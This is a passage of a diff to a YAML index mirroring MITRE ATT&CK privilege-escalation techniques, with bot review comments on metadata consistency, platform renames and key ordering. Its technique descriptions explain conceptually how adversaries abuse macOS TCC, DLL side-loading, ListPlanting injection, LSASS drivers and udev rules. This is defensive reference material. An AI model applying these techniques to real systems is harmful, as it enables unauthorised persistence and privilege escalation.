x_mitre_detection: ''
x_mitre_domains:
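Review bot: `Alexander Rodchenko` becomes `Rodchenko Aleksandr` (surname first, different transliteration), the opposite direction of the `Goldstein Menachem` to `Menachem Goldstein` change earlier in this patch. Contributor strings come from the upstream STIX object, so this is probably faithful to upstream, but one of the two orderings is inconsistent; confirm both against the ATT&CK source rather than hand-editing either, so the index stays a verbatim mirror.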
@@ -22544,7 +22834,6 @@ privilege-escalation:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1037.004:
technique:
@@ -22626,12 +22915,11 @@ privilege-escalation:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1037.004
atomic_tests: []
T1134:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2023-03-30T21:01:47.762Z'
name: Access Token Manipulation
description: |-
Adversaries may modify access tokens to operate under a different user or system security context to perform actions and bypass access controls. Windows uses access tokens to determine the ownership of a running process. A user can manipulate access tokens to make a running process appear as though it is the child of a different process or belongs to someone other than the user that started the process. When this occurs, the process also takes on the security context associated with the new token.
@@ -22728,7 +23016,6 @@ privilege-escalation:
url: https://pentestlab.blog/2017/04/03/token-manipulation/
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- spec_version: '2.1'
atomic_tests: []
T1543.002:
technique:
@@ -22842,7 +23129,6 @@ privilege-escalation:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1543.002
atomic_tests: []
T1547.013:
@@ -22912,7 +23198,6 @@ privilege-escalation:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1055.005:
technique:
@@ -22940,7 +23225,7 @@ privilege-escalation:
A Technical Survey Of Common And Trending Process Injection Techniques.
Retrieved December 7, 2017.'
source_name: Elastic Process Injection July 2017
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2021-10-18T12:24:54.198Z'
name: Thread Local Storage
description: "Adversaries may inject malicious code into processes via thread
local storage (TLS) callbacks in order to evade process-based defenses as
@@ -22984,8 +23269,6 @@ privilege-escalation:
x_mitre_defense_bypassed:
- Anti-virus
- Application control
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1547.007:
technique:
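Review bot: this hunk removes `x_mitre_attack_spec_version: 2.1.0` for T1055.005 together with `spec_version`, and nothing adds it back, so the object is left with no ATT&CK spec version at all while its neighbours carry `x_mitre_attack_spec_version: 3.2.0`. The same happens to T1055.008 and T1037.001 below. Either the source objects for these three were not refreshed in the upstream release, or the generator drops the field when it equals 2.1.0; worth checking before merge so the per-object metadata stays uniform.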
@@ -23021,7 +23304,7 @@ privilege-escalation:
Adversaries may modify plist files to automatically run an application when a user logs in. When a user logs out or restarts via the macOS Graphical User Interface (GUI), a prompt is provided to the user with a checkbox to "Reopen windows when logging back in".(Citation: Re-Open windows on Mac) When selected, all applications currently open are added to a property list file named com.apple.loginwindow.[UUID].plist
within the ~/Library/Preferences/ByHost
directory.(Citation: Methods of Mac Malware Persistence)(Citation: Wardle Persistence Chapter) Applications listed in this file are automatically reopened upon the user’s next logon.
Adversaries can establish [Persistence](https://attack.mitre.org/tactics/TA0003) by adding a malicious application path to the com.apple.loginwindow.[UUID].plist
file to execute payloads when a user logs in.
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2022-04-19T23:46:56.443Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
name: 'Boot or Logon Autostart Execution: Re-opened Applications'
x_mitre_detection: Monitoring the specific plist files associated with reopening
@@ -23040,12 +23323,11 @@ privilege-escalation:
- User
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1547.007
atomic_tests: []
T1574.002:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2023-03-30T21:01:47.241Z'
name: 'Hijack Execution Flow: DLL Side-Loading'
description: |-
Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to [DLL Search Order Hijacking](https://attack.mitre.org/techniques/T1574/001), side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
@@ -23095,12 +23377,11 @@ privilege-escalation:
url: https://www.fireeye.com/content/dam/fireeye-www/global/en/current-threats/pdfs/rpt-dll-sideloading.pdf
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- spec_version: '2.1'
identifier: T1574.002
atomic_tests: []
T1098.002:
technique:
- modified: '2024-01-03T15:46:06.706Z'
+ modified: '2024-10-15T15:37:25.303Z'
name: 'Account Manipulation: Additional Email Delegate Permissions'
description: "Adversaries may grant additional permission levels to maintain
persistent access to an adversary-controlled email account. \n\nFor example,
@@ -23133,9 +23414,10 @@ privilege-escalation:
x_mitre_contributors:
- Microsoft Detection and Response Team (DART)
- Mike Burns, Mandiant
- - Naveen Vijayaraghavan, Nilesh Dherange (Gurucul)
- Jannie Li, Microsoft Threat Intelligence Center (MSTIC)
- Arad Inbar, Fidelis Security
+ - Nilesh Dherange (Gurucul)
+ - Naveen Vijayaraghavan
x_mitre_deprecated: false
x_mitre_detection: "Monitor for unusual Exchange and Office 365 email account
permissions changes that may indicate excessively broad permissions being
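Review bot: the contributor line `Naveen Vijayaraghavan, Nilesh Dherange (Gurucul)` is split into `Nilesh Dherange (Gurucul)` and `Naveen Vijayaraghavan`, and the second name loses the Gurucul affiliation in the split. If this mirrors the upstream ATT&CK contributor list verbatim it is fine to keep; if the split was done by hand, carry the affiliation on both names (or neither) so attribution stays consistent.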
@@ -23152,9 +23434,8 @@ privilege-escalation:
x_mitre_is_subtechnique: true
x_mitre_platforms:
- Windows
- - Office 365
- - Google Workspace
- x_mitre_version: '2.1'
+ - Office Suite
+ x_mitre_version: '2.2'
x_mitre_data_sources:
- 'Group: Group Modification'
- 'Application Log: Application Log Content'
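Review bot: `Office 365` and `Google Workspace` are replaced by the single platform `Office Suite` for T1098.002, consistent with the ATT&CK v16 platform consolidation, and the same rename turns `Azure AD`/`SaaS` into `Identity Provider` for T1484 and `Azure AD`/`Office 365`/`Google Workspace` into `Office Suite`/`Identity Provider` for T1078.004 further down. Any per-platform index derived from `x_mitre_platforms` has to be regenerated in this same change, otherwise the technique silently vanishes from the old platform indexes without appearing in a new one. Also double check that T1484 dropping `SaaS` outright (rather than renaming it) is what upstream did, since `SaaS` survives as a platform on T1078.004.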
@@ -23200,38 +23481,19 @@ privilege-escalation:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1098.002
atomic_tests: []
T1548.006:
technique:
- modified: '2024-04-17T00:02:12.021Z'
+ modified: '2024-10-16T16:54:56.714Z'
name: TCC Manipulation
- description: "Adversaries can manipulate or abuse the Transparency, Consent,
- & Control (TCC) service or database to execute malicious applications with
- elevated permissions. TCC is a Privacy & Security macOS control mechanism
- used to determine if the running process has permission to access the data
- or services protected by TCC, such as screen sharing, camera, microphone,
- or Full Disk Access (FDA).\n\nWhen an application requests to access data
- or a service protected by TCC, the TCC daemon (`tccd`) checks the TCC database,
- located at `/Library/Application Support/com.apple.TCC/TCC.db` (and `~/` equivalent),
- for existing permissions. If permissions do not exist, then the user is prompted
- to grant permission. Once permissions are granted, the database stores the
- application's permissions and will not prompt the user again unless reset.
- For example, when a web browser requests permissions to the user's webcam,
- once granted the web browser may not explicitly prompt the user again.(Citation:
- welivesecurity TCC)\n\nAdversaries may manipulate the TCC database or otherwise
- abuse the TCC service to execute malicious content. This can be done in various
- ways, including using privileged system applications to execute malicious
- payloads or manipulating the database to grant their application TCC permissions.
- \n\nFor example, adversaries can use Finder, which has FDA permissions by
- default, to execute malicious [AppleScript](https://attack.mitre.org/techniques/T1059/002)
- while preventing a user prompt. For a system without System Integrity Protection
- (SIP) enabled, adversaries have also manipulated the operating system to load
- an adversary controlled TCC database using environment variables and [Launchctl](https://attack.mitre.org/techniques/T1569/001).(Citation:
- TCC macOS bypass)(Citation: TCC Database)\n\nAdversaries may also opt to instead
- inject code (e.g., [Process Injection](https://attack.mitre.org/techniques/T1055))
- into targeted applications with the desired TCC permissions.\n"
+ description: |+
+ Adversaries can manipulate or abuse the Transparency, Consent, & Control (TCC) service or database to grant malicious executables elevated permissions. TCC is a Privacy & Security macOS control mechanism used to determine if the running process has permission to access the data or services protected by TCC, such as screen sharing, camera, microphone, or Full Disk Access (FDA).
+
+ When an application requests to access data or a service protected by TCC, the TCC daemon (`tccd`) checks the TCC database, located at `/Library/Application Support/com.apple.TCC/TCC.db` (and `~/` equivalent), and an overwrites file (if connected to an MDM) for existing permissions. If permissions do not exist, then the user is prompted to grant permission. Once permissions are granted, the database stores the application's permissions and will not prompt the user again unless reset. For example, when a web browser requests permissions to the user's webcam, once granted the web browser may not explicitly prompt the user again.(Citation: welivesecurity TCC)
+
+ Adversaries may access restricted data or services protected by TCC through abusing applications previously granted permissions through [Process Injection](https://attack.mitre.org/techniques/T1055) or executing a malicious binary using another application. For example, adversaries can use Finder, a macOS native app with FDA permissions, to execute a malicious [AppleScript](https://attack.mitre.org/techniques/T1059/002). When executing under the Finder App, the malicious [AppleScript](https://attack.mitre.org/techniques/T1059/002) inherits access to all files on the system without requiring a user prompt. When System Integrity Protection (SIP) is disabled, TCC protections are also disabled. For a system without SIP enabled, adversaries can manipulate the TCC database to add permissions to their malicious executable through loading an adversary controlled TCC database using environment variables and [Launchctl](https://attack.mitre.org/techniques/T1569/001).(Citation: TCC macOS bypass)(Citation: TCC Database)
+
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: defense-evasion
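Review bot: the new `description: |+` for T1548.006 uses the keep chomping indicator, and with the empty line closing the block the parsed string ends in two newlines, whereas the previous double-quoted value ended in a single `\n` and the other block-scalar descriptions in this diff use `|-`, which strips trailing newlines. Unless the generator is deliberately reproducing the upstream string's trailing whitespace, use `|` (one trailing newline, matching the old value) or `|-` (matching the other entries) so the value does not churn on the next regeneration. The rewritten text otherwise reads as a verbatim copy of the upstream wording, including "an overwrites file", which should stay as-is in a mirrored file rather than be hand-corrected here.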
@@ -23239,6 +23501,8 @@ privilege-escalation:
phase_name: privilege-escalation
x_mitre_contributors:
- Marina Liang
+ - Wojciech Reguła @_r3ggi
+ - Csaba Fitzl @theevilbit of Kandji
x_mitre_deprecated: false
x_mitre_detection: ''
x_mitre_domains:
@@ -23246,7 +23510,7 @@ privilege-escalation:
x_mitre_is_subtechnique: true
x_mitre_platforms:
- macOS
- x_mitre_version: '1.0'
+ x_mitre_version: '1.1'
x_mitre_data_sources:
- 'Command: Command Execution'
- 'File: File Modification'
@@ -23276,7 +23540,6 @@ privilege-escalation:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1055.008:
technique:
@@ -23322,7 +23585,7 @@ privilege-escalation:
description: stderr. (2014, February 14). Detecting Userland Preload Rootkits.
Retrieved December 20, 2017.
source_name: Chokepoint preload rootkits
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2021-10-18T12:26:31.766Z'
name: Ptrace System Calls
description: "Adversaries may inject malicious code into processes via ptrace
(process trace) system calls in order to evade process-based defenses as well
@@ -23367,8 +23630,6 @@ privilege-escalation:
x_mitre_defense_bypassed:
- Anti-virus
- Application control
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1037.001:
technique:
@@ -23394,7 +23655,7 @@ privilege-escalation:
url: http://www.hexacorn.com/blog/2014/11/14/beyond-good-ol-run-key-part-18/
description: Hexacorn. (2014, November 14). Beyond good ol’ Run key, Part
18. Retrieved November 15, 2019.
- modified: '2021-04-29T14:49:39.188Z'
+ modified: '2020-03-24T23:45:03.153Z'
name: 'Boot or Logon Initialization Scripts: Logon Script (Windows)'
description: "Adversaries may use Windows logon scripts automatically executed
at logon initialization to establish persistence. Windows allows logon scripts
@@ -23420,59 +23681,28 @@ privilege-escalation:
- 'Command: Command Execution'
- 'Process: Process Creation'
- 'Windows Registry: Windows Registry Key Creation'
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
identifier: T1037.001
atomic_tests: []
T1055.015:
technique:
- x_mitre_platforms:
- - Windows
- x_mitre_domains:
- - enterprise-attack
- x_mitre_contributors:
- - ESET
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--eb2cb5cb-ae87-4de0-8c35-da2a17aafb99
- type: attack-pattern
- created: '2021-11-22T15:02:15.190Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- external_references:
- - source_name: mitre-attack
- external_id: T1055.015
- url: https://attack.mitre.org/techniques/T1055/015
- - source_name: Microsoft List View Controls
- url: https://docs.microsoft.com/windows/win32/controls/list-view-controls-overview
- description: Microsoft. (2021, May 25). About List-View Controls. Retrieved
- January 4, 2022.
- - source_name: Modexp Windows Process Injection
- url: https://modexp.wordpress.com/2019/04/25/seven-window-injection-methods/
- description: 'odzhan. (2019, April 25). Windows Process Injection: WordWarping,
- Hyphentension, AutoCourgette, Streamception, Oleum, ListPlanting, Treepoline.
- Retrieved November 15, 2021.'
- - source_name: ESET InvisiMole June 2020
- url: https://www.welivesecurity.com/wp-content/uploads/2020/06/ESET_InvisiMole.pdf
- description: 'Hromcova, Z. and Cherpanov, A. (2020, June). INVISIMOLE: THE
- HIDDEN PART OF THE STORY. Retrieved July 16, 2020.'
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2024-08-14T17:34:33.948Z'
name: 'Process Injection: ListPlanting'
description: "Adversaries may abuse list-view controls to inject malicious code
into hijacked processes in order to evade process-based defenses as well as
possibly elevate privileges. ListPlanting is a method of executing arbitrary
- code in the address space of a separate live process. Code executed via ListPlanting
- may also evade detection from security products since the execution is masked
- under a legitimate process.\n\nList-view controls are user interface windows
- used to display collections of items.(Citation: Microsoft List View Controls)
- Information about an application's list-view settings are stored within the
- process' memory in a SysListView32
control.\n\nListPlanting (a
- form of message-passing \"shatter attack\") may be performed by copying code
- into the virtual address space of a process that uses a list-view control
- then using that code as a custom callback for sorting the listed items.(Citation:
- Modexp Windows Process Injection) Adversaries must first copy code into the
- target process’ memory space, which can be performed various ways including
- by directly obtaining a handle to the SysListView32
child of
- the victim process window (via Windows API calls such as FindWindow
+ code in the address space of a separate live process.(Citation: Hexacorn Listplanting)
+ Code executed via ListPlanting may also evade detection from security products
+ since the execution is masked under a legitimate process.\n\nList-view controls
+ are user interface windows used to display collections of items.(Citation:
+ Microsoft List View Controls) Information about an application's list-view
+ settings are stored within the process' memory in a SysListView32
+ control.\n\nListPlanting (a form of message-passing \"shatter attack\") may
+ be performed by copying code into the virtual address space of a process that
+ uses a list-view control then using that code as a custom callback for sorting
+ the listed items.(Citation: Modexp Windows Process Injection) Adversaries
+ must first copy code into the target process’ memory space, which can be performed
+ various ways including by directly obtaining a handle to the SysListView32
+ child of the victim process window (via Windows API calls such as FindWindow
and/or EnumWindows
) or other [Process Injection](https://attack.mitre.org/techniques/T1055)
methods.\n\nSome variations of ListPlanting may allocate memory in the target
process but then use window messages to copy the payload, to avoid the use
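Review bot: most of this hunk is not a content change: `x_mitre_platforms`, `x_mitre_domains`, `x_mitre_contributors`, `object_marking_refs`, `id`, `type`, `created`, `created_by_ref` and the whole `external_references` list are deleted here only to be re-added, in a different order, in the hunk that follows, and `x_mitre_attack_spec_version` / `x_mitre_modified_by_ref` are shuffled the same way for T1078.004 later in the file. That buries the real changes to T1055.015 (the new `(Citation: Hexacorn Listplanting)` and the reflowed description) under sixty lines of churn. Have the generator emit mapping keys in a fixed order (sorted, or in the upstream object's order) so sync diffs show only what actually changed.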
@@ -23489,6 +23719,9 @@ privilege-escalation:
phase_name: defense-evasion
- kill_chain_name: mitre-attack
phase_name: privilege-escalation
+ x_mitre_contributors:
+ - ESET
+ x_mitre_deprecated: false
x_mitre_detection: "Monitoring Windows API calls indicative of the various types
of code injection may generate a significant amount of data and may not be
directly useful for defense unless collected under specific circumstances
@@ -23503,21 +23736,52 @@ privilege-escalation:
arguments.\n\nAnalyze process behavior to determine if a process is performing
unusual actions, such as opening network connections, reading files, or other
suspicious actions that could relate to post-compromise behavior. "
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: true
- x_mitre_version: '1.0'
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ x_mitre_platforms:
+ - Windows
+ x_mitre_version: '1.1'
x_mitre_data_sources:
- 'Process: Process Modification'
- 'Process: OS API Execution'
x_mitre_permissions_required:
- User
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
+ type: attack-pattern
+ id: attack-pattern--eb2cb5cb-ae87-4de0-8c35-da2a17aafb99
+ created: '2021-11-22T15:02:15.190Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1055/015
+ external_id: T1055.015
+ - source_name: Hexacorn Listplanting
+ description: Hexacorn. (2019, April 25). Listplanting – yet another code injection
+ trick. Retrieved August 14, 2024.
+ url: https://www.hexacorn.com/blog/2019/04/25/listplanting-yet-another-code-injection-trick/
+ - source_name: ESET InvisiMole June 2020
+ description: 'Hromcova, Z. and Cherpanov, A. (2020, June). INVISIMOLE: THE
+ HIDDEN PART OF THE STORY. Retrieved July 16, 2020.'
+ url: https://www.welivesecurity.com/wp-content/uploads/2020/06/ESET_InvisiMole.pdf
+ - source_name: Microsoft List View Controls
+ description: Microsoft. (2021, May 25). About List-View Controls. Retrieved
+ January 4, 2022.
+ url: https://docs.microsoft.com/windows/win32/controls/list-view-controls-overview
+ - source_name: Modexp Windows Process Injection
+ description: 'odzhan. (2019, April 25). Windows Process Injection: WordWarping,
+ Hyphentension, AutoCourgette, Streamception, Oleum, ListPlanting, Treepoline.
+ Retrieved November 15, 2021.'
+ url: https://modexp.wordpress.com/2019/04/25/seven-window-injection-methods/
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
identifier: T1055.015
atomic_tests: []
T1484:
technique:
- modified: '2024-04-19T04:27:31.884Z'
+ modified: '2024-10-15T15:55:32.946Z'
name: Domain or Tenant Policy Modification
description: "Adversaries may modify the configuration settings of a domain
or identity tenant to evade defenses and/or escalate privileges in centrally
@@ -23562,9 +23826,8 @@ privilege-escalation:
x_mitre_is_subtechnique: false
x_mitre_platforms:
- Windows
- - Azure AD
- - SaaS
- x_mitre_version: '3.0'
+ - Identity Provider
+ x_mitre_version: '3.1'
x_mitre_data_sources:
- 'Active Directory: Active Directory Object Deletion'
- 'Active Directory: Active Directory Object Creation'
@@ -23621,8 +23884,8 @@ privilege-escalation:
url: https://wald0.com/?p=179
- source_name: Harmj0y Abusing GPO Permissions
description: Schroeder, W. (2016, March 17). Abusing GPO Permissions. Retrieved
- March 5, 2019.
- url: http://www.harmj0y.net/blog/redteaming/abusing-gpo-permissions/
+ September 23, 2024.
+ url: https://blog.harmj0y.net/redteaming/abusing-gpo-permissions/
- source_name: Sygnia Golden SAML
description: Sygnia. (2020, December). Detection and Hunting of Golden SAML
Attack. Retrieved January 6, 2021.
@@ -23631,7 +23894,6 @@ privilege-escalation:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1547.008:
technique:
@@ -23673,7 +23935,7 @@ privilege-escalation:
Adversaries may modify or add LSASS drivers to obtain persistence on compromised systems. The Windows security subsystem is a set of components that manage and enforce the security policy for a computer or domain. The Local Security Authority (LSA) is the main component responsible for local security policy and user authentication. The LSA includes multiple dynamic link libraries (DLLs) associated with various other security functions, all of which run in the context of the LSA Subsystem Service (LSASS) lsass.exe process.(Citation: Microsoft Security Subsystem)
Adversaries may target LSASS drivers to obtain persistence. By either replacing or adding illegitimate drivers (e.g., [Hijack Execution Flow](https://attack.mitre.org/techniques/T1574)), an adversary can use LSA operations to continuously execute malicious payloads.
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2022-04-20T16:34:43.405Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
name: 'Boot or Logon Autostart Execution: LSASS Driver'
x_mitre_detection: "With LSA Protection enabled, monitor the event logs (Events
@@ -23698,12 +23960,11 @@ privilege-escalation:
- Administrator
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1547.008
atomic_tests: []
T1078.004:
technique:
- modified: '2024-03-29T15:42:13.499Z'
+ modified: '2024-10-14T22:11:30.271Z'
name: 'Valid Accounts: Cloud Accounts'
description: "Valid accounts in cloud environments may allow adversaries to
perform actions to achieve Initial Access, Persistence, Privilege Escalation,
@@ -23743,8 +24004,10 @@ privilege-escalation:
phase_name: privilege-escalation
- kill_chain_name: mitre-attack
phase_name: initial-access
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_contributors:
- Jon Sternstein, Stern Security
+ - Arun Seelagan, CISA
x_mitre_deprecated: false
x_mitre_detection: Monitor the activity of cloud accounts to detect abnormal
or malicious behavior, such as accessing information outside of the normal
@@ -23752,13 +24015,13 @@ privilege-escalation:
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: true
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- - Azure AD
- - Office 365
- SaaS
- IaaS
- - Google Workspace
- x_mitre_version: '1.7'
+ - Office Suite
+ - Identity Provider
+ x_mitre_version: '1.8'
x_mitre_data_sources:
- 'User Account: User Account Authentication'
- 'Logon Session: Logon Session Metadata'
@@ -23789,9 +24052,6 @@ privilege-escalation:
url: https://docs.microsoft.com/en-us/windows-server/identity/ad-fs/deployment/how-to-connect-fed-azure-adfs
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.2.0
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1078.004
atomic_tests:
- name: Creating GCP Service Account and Service Account Key
@@ -23913,10 +24173,10 @@ privilege-escalation:
'
T1053.002:
technique:
- modified: '2023-11-15T14:38:10.876Z'
+ modified: '2024-10-12T15:53:12.333Z'
name: 'Scheduled Task/Job: At'
description: |-
- Adversaries may abuse the [at](https://attack.mitre.org/software/S0110) utility to perform task scheduling for initial or recurring execution of malicious code. The [at](https://attack.mitre.org/software/S0110) utility exists as an executable within Windows, Linux, and macOS for scheduling tasks at a specified time and date. Although deprecated in favor of [Scheduled Task](https://attack.mitre.org/techniques/T1053/005)'s [schtasks](https://attack.mitre.org/software/S0111) in Windows environments, using [at](https://attack.mitre.org/software/S0110) requires that the Task Scheduler service be running, and the user to be logged on as a member of the local Administrators group.
+ Adversaries may abuse the [at](https://attack.mitre.org/software/S0110) utility to perform task scheduling for initial or recurring execution of malicious code. The [at](https://attack.mitre.org/software/S0110) utility exists as an executable within Windows, Linux, and macOS for scheduling tasks at a specified time and date. Although deprecated in favor of [Scheduled Task](https://attack.mitre.org/techniques/T1053/005)'s [schtasks](https://attack.mitre.org/software/S0111) in Windows environments, using [at](https://attack.mitre.org/software/S0110) requires that the Task Scheduler service be running, and the user to be logged on as a member of the local Administrators group. In addition to explicitly running the `at` command, adversaries may also schedule a task with [at](https://attack.mitre.org/software/S0110) by directly leveraging the [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) `Win32_ScheduledJob` WMI class.(Citation: Malicious Life by Cybereason)
On Linux and macOS, [at](https://attack.mitre.org/software/S0110) may be invoked by the superuser as well as any users added to the at.allow
file. If the at.allow
file does not exist, the at.deny
file is checked. Every username not listed in at.deny
is allowed to invoke [at](https://attack.mitre.org/software/S0110). If the at.deny
exists and is empty, global use of [at](https://attack.mitre.org/software/S0110) is permitted. If neither file exists (which is often the baseline) only the superuser is allowed to use [at](https://attack.mitre.org/software/S0110).(Citation: Linux at)
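Review bot: the sentence appended to the T1053.002 description introduces `(Citation: Malicious Life by Cybereason)`, and the matching `source_name` is only added in a later hunk of this same change, so the two must land together. A CI check that every `(Citation: X)` token in a description resolves to an `external_references[].source_name` on the same object would catch a future sync that updates one side without the other.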
@@ -23979,7 +24239,7 @@ privilege-escalation:
- Windows
- Linux
- macOS
- x_mitre_version: '2.2'
+ x_mitre_version: '2.3'
x_mitre_data_sources:
- 'Command: Command Execution'
- 'Scheduled Job: Scheduled Job Creation'
@@ -24013,8 +24273,8 @@ privilege-escalation:
url: https://man7.org/linux/man-pages/man1/at.1p.html
- source_name: Twitter Leoloobeek Scheduled Task
description: Loobeek, L. (2017, December 8). leoloobeek Status. Retrieved
- December 12, 2017.
- url: https://twitter.com/leoloobeek/status/939248813465853953
+ September 12, 2024.
+ url: https://x.com/leoloobeek/status/939248813465853953
- source_name: Microsoft Scheduled Task Events Win10
description: Microsoft. (2017, May 28). Audit Other Object Access Events.
Retrieved June 27, 2019.
@@ -24023,6 +24283,10 @@ privilege-escalation:
description: Microsoft. (n.d.). General Task Registration. Retrieved December
12, 2017.
url: https://technet.microsoft.com/library/dd315590.aspx
+ - source_name: Malicious Life by Cybereason
+ description: Philip Tsukerman. (n.d.). No Win32 Process Needed | Expanding
+ the WMI Lateral Movement Arsenal. Retrieved June 19, 2024.
+ url: https://www.cybereason.com/blog/wmi-lateral-movement-win32#blog-subscribe
- source_name: TechNet Autoruns
description: Russinovich, M. (2016, January 4). Autoruns for Windows v13.51.
Retrieved June 6, 2016.
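Review bot: the new `Malicious Life by Cybereason` reference URL ends in `#blog-subscribe`, a fragment that points at the page's newsletter widget rather than at the article. If this file mirrors the upstream ATT&CK reference verbatim, keep it so the next regeneration does not reintroduce a diff; otherwise drop the fragment, since it adds nothing to the citation.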
@@ -24035,7 +24299,6 @@ privilege-escalation:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1053.002
atomic_tests: []
T1055.001:
@@ -24138,9 +24401,67 @@ privilege-escalation:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1055.001
atomic_tests: []
+ T1546.017:
+ technique:
+ modified: '2024-11-11T19:05:38.708Z'
+ name: Udev Rules
+ description: |-
+ Adversaries may maintain persistence through executing malicious content triggered using udev rules. Udev is the Linux kernel device manager that dynamically manages device nodes, handles access to pseudo-device files in the `/dev` directory, and responds to hardware events, such as when external devices like hard drives or keyboards are plugged in or removed. Udev uses rule files with `match keys` to specify the conditions a hardware event must meet and `action keys` to define the actions that should follow. Root permissions are required to create, modify, or delete rule files located in `/etc/udev/rules.d/`, `/run/udev/rules.d/`, `/usr/lib/udev/rules.d/`, `/usr/local/lib/udev/rules.d/`, and `/lib/udev/rules.d/`. Rule priority is determined by both directory and by the digit prefix in the rule filename.(Citation: Ignacio Udev research 2024)(Citation: Elastic Linux Persistence 2024)
+
+ Adversaries may abuse the udev subsystem by adding or modifying rules in udev rule files to execute malicious content. For example, an adversary may configure a rule to execute their binary each time the pseudo-device file, such as `/dev/random`, is accessed by an application. Although udev is limited to running short tasks and is restricted by systemd-udevd's sandbox (blocking network and filesystem access), attackers may use scripting commands under the action key `RUN+=` to detach and run the malicious content’s process in the background to bypass these controls.(Citation: Reichert aon sedexp 2024)
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: persistence
+ - kill_chain_name: mitre-attack
+ phase_name: privilege-escalation
+ x_mitre_contributors:
+ - Eduardo González Hernández (@codexlynx)
+ - Eder Pérez Ignacio, @ch4ik0
+ - Wirapong Petshagun
+ - "@grahamhelton3"
+ - Ruben Groenewoud, Elastic
+ x_mitre_deprecated: false
+ x_mitre_detection: 'Monitor file creation and modification of Udev rule files
+ in `/etc/udev/rules.d/`, `/lib/udev/rules.d/`, and /usr/lib/udev/rules.d/,
+ specifically the `RUN` action key commands.(Citation: Ignacio Udev research
+ 2024) '
+ x_mitre_domains:
+ - enterprise-attack
+ x_mitre_is_subtechnique: true
+ x_mitre_platforms:
